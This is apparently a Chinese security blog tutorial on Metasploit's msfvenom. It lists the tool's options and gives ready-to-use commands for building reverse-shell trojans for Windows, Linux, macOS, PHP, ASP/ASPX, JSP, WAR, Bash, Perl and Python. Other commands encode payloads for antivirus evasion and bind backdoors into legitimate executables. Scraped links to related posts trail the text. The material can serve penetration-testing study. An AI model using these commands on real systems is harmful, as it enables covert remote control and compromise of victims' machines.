作者名:白昼安全
主页面链接: 主页传送门
创作初心: 一切为了她
座右铭: 不要让时代的悲哀成为你的悲哀
专研方向: web安全,后渗透技术
每日emo: 钱真的是万能的

一、msfvenom基本使用

1、–p (- -payload-options)

添加载荷payload。

(- -payload-options 列出payload选项)

2、–l

查看所有payload encoder nops。

3. –f (- -help-formats)

输出文件格式。

(- -help-formats 列出所有文件格式)

Executable formats:

asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, jar, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-net, psh-reflection, psh-cmd, vba, vba
exe, vba-psh, vbs, war

Transform formats:

bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript

4、–e

编码免杀。

5、–a (- -platform – -help-platforms)

选择架构平台

x86 | x64 | x86_64

Platforms:

windows, netware, android, java, ruby, linux, cisco, solaris, osx, bsd, openbsd, bsdi, netbsd, freebsd, aix, hpux, irix, unix, php, javascript, python, nodejs, firefox, mainframe

6、–o

文件输出。

7、–s

生成payload的最大长度,就是文件大小。

8、–b

避免使用的字符 例如:不使用 ‘\0f’。

9、–i

编码次数。

10、–c

添加自己的shellcode。

11、–x | -k

捆绑。例如:原先有个正常文件normal.exe 可以通过这个选项把后门捆绑到这个程序上面。

二、msfvenom使用实例

下面列举一些平时常用的木马生成的案例,如下

1、普通生成

单纯生成一个后门,-p指定payload,-f指定生成的木马格式,-o指定木马保存位置

msfvenom -p < payload > < payload options > -f < format > -o < path > msfvenom –p windows/meterpreter/reverse_tcp –f exe –o C:\back.exe 

2、编码处理

使用-e对生成的木马进行编码处理

msfvenom -p < payload > -e < encoder > -i < encoder times > -n < nopsled > -f < format > -o < path > msfvenom –p windows/meterpreter/reverse_tcp –i 3 –e x86/shikata_ga_nai –f exe –o C:\back.exe 

3、捆绑

把后门捆绑到指定程序上,例子如下

Msfvenom –p windows/meterpreter/reverse_tcp –platform windows –a x86 –x C:\nomal.exe –k –f exe –o C:\shell.exe

4、Windows

生成windows木马程序,这里以生成windows反向木马为例(-a选择架构平台)

Msfvenom –platform windows –a x86 –p windows/meterpreter/reverse_tcp –i 3 –e x86/shikata_ga_nai –f exe –o C:\back.exe Msfvenom –platform windows –a x86 –p windows/x64/meterpreter/reverse_tcp –f exe –o C:\back.exe 

5、Linux

生成可以控制linux的木马程序(下面的例子中为反向)

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= < Your IP Address > LPORT= < Your Port to Connect On > -f elf > shell.elf 

6、MAC

生成可以控制mac版本的木马程序,,格式如下

msfvenom -p osx/x86/shell_reverse_tcp LHOST= < Your IP Address > LPORT= < Your Port to Connect On > -f macho > shell.macho 

7、PHP

生成php反弹木马程序

msfvenom -p php/meterpreter_reverse_tcp LHOST= < Your IP Address > LPORT= < Your Port to Connect On > -f raw > shell.php 

8、Asp

生成asp木马程序

msfvenom -p windows/meterpreter/reverse_tcp LHOST= < Your IP Address > LPORT= < Your Port to Connect On > -f asp > shell.asp 

9、Aspx

生成aspx木马程序

msfvenom -p windows/meterpreter/reverse_tcp LHOST= < Your IP Address > LPORT= < Your Port to Connect On > -f aspx > shell.aspx 

10、JSP

生成jsp木马程序

msfvenom -p java/jsp_shell_reverse_tcp LHOST= < Your IP Address > LPORT= < Your Port to Connect On > -f raw > shell.jsp 

11、War

war格式木马程序

msfvenom -p java/jsp_shell_reverse_tcp LHOST= < Your IP Address > LPORT= < Your Port to Connect On > -f war > shell.war 

12、Bash

bash脚本格式木马程序

msfvenom -p cmd/unix/reverse_bash LHOST= < Your IP Address > LPORT= < Your Port to Connect On > -f raw > shell.sh 

13、Perl

生成pl格式木马程序

msfvenom -p cmd/unix/reverse_perl LHOST= < Your IP Address > LPORT= < Your Port to Connect On > -f raw > shell.pl 

14、Python

生成py格式木马程序

msfvenom -p python/meterpreter/reverser_tcp LHOST= < Your IP Address > LPORT= < Your Port to Connect On > -f raw > shell.py 

【内网安全】——msf木马生成教程相关推荐

  1. [内网基础]msf使用内网实战演示

    [内网基础]msf使用&内网实战演示 msf是一款渗透测试使用的框架,其中包含了很多工具. 官方手册地址: https://docs.metasploit.com/docs/using-met ...

  2. 内网穿透工具nps使用教程 - 来自内部交流群

    内网穿透工具nps使用教程.docx 内网穿透工具nps使用教程 感谢 感谢开源软件开发者,github链接https://github.com/cnlh/nps/ 感兴趣的去star下吧~ 视频教程 ...

  3. frp内网穿透入门级木马上线实践

    简介 在实践课上有布置frp内网穿透(内网到公网)和简单的msf木马使用(木马只能内网通信)的任务.此处将两者结合,把木马链接到服务器上,经过内网穿透在本地控制木马.都是入门级实践. 准备 frp代码 ...

  4. 内网后渗透,生成免杀后门!!

    大家好,初来CSDN请大家多多关注.今天给大家带来的是后内网渗透---免杀木马生成!! 经过本人的一段时间研究终于研究出了一个过火绒等免杀后门,过程有点复杂,待我细细道来. 一.在自己公网服务器上面装 ...

  5. 红蓝对抗之隧道技术第一篇(内网穿透、端口映射端口转发、Netsh端口转发、CS正反向连接多层内网、Burp设置上游代理访问内网、MSF protfwd端口转发/重定向)

    文章目录 隧道应用 端口映射&端口转发 Netsh端口转发 Netsh端口转发meterpreter CS正向连接多层内网 CS反向连接多层内网 Burp设置上游代理访问内网 MSF prot ...

  6. 使用frp配置内网访问(穿透)教程(超详细,简单)

    1 Frp介绍 frp 是一个开源.简洁易用.高性能的内网穿透和反向代理软件,支持 tcp, udp, http, https等协议.frp 项目官网是 https://github.com/fate ...

  7. 安排几款实用的内网穿透工具(加教程)

    点击关注公众号,利用碎片时间学习 0x00 前言 本文以渗透的视角,总结几种个人常用的内网穿透,内网代理工具,介绍其简单原理和使用方法. 0x01 nps-npc 1.1 简介 nps是一款轻量级.高 ...

  8. Ngrok(内网穿透工具)使用教程详解

    简介 国内Ngrok官网地址 Ngrok是什么? ngrok 是一个反向代理,通过在公共的端点和本地运行的 Web 服务器之间建立一个安全的通道 ngrok 可捕获和分析所有通道上的流量,便于后期分析 ...

  9. 内网渗透-msf及socks代理转发

    0x00 学习环境 拓扑如上,现在已经拥有了WIN2008的meterpreter权限 希望通过此主机进行代理转发,从而使msf能够攻击WIN7从而拿到权限. 0x01 路由转发1 先在meterpr ...

最新文章

  1. Linux_KVM虚拟机
  2. STM32F1笔记(一)GPIO输出
  3. python OOP(2)
  4. CB Insights,201608月174家独角兽榜单出炉,上榜的33家中国公司都是谁?
  5. CF1042F Leaf Sets
  6. (二十一)美萍酒店管理系统:系统维护_系统设置_房间类型_房间费打折
  7. 用JS实现图片模糊到清晰预加载效果
  8. android手写输入法开发,基于Android平台的云计算手写输入法
  9. Pocket PC、Pocket PC phone、Smartphone的区别
  10. lay和lied_辨析:lie, lay, lain, lied, laid
  11. JS入门笔记九:循环精灵图案例
  12. linux键盘触摸板失灵,ubuntu linux 触控板失灵的解决方案
  13. 宽带常见的有20 30 50 100兆指的是什么意思???
  14. python自动登录校园网_python实现校园网一键自动连接
  15. 命令模式——经营烧烤摊
  16. Mac 查看本机ip地址
  17. 【系统分析师之路】第二十章 数学与经济管理(章节重点)
  18. VideoProc 4K for mac(一站式视频处理软件)
  19. 0409-css文字属性
  20. 6000分“无聊大师”——张小龙

热门文章

  1. reactive() 函数
  2. 【众说区块链】公链是否一定要发币,Token到底应该怎么理解?
  3. c语言(http://c.biancheng.net/view/1714.html)
  4. 新闻资讯类网站的PC端前台模板分享
  5. Hugging Face(1)——Transformer Models
  6. 两个决策树例题经典案例-代码示例
  7. 网络安全实验1 Sniffer Pro网络分析器应用实验
  8. BiLSTM+CRF实现AI诗人与长短记忆网络
  9. JS 的 _.isEmpty()函数使用
  10. 微信公众平台开发过程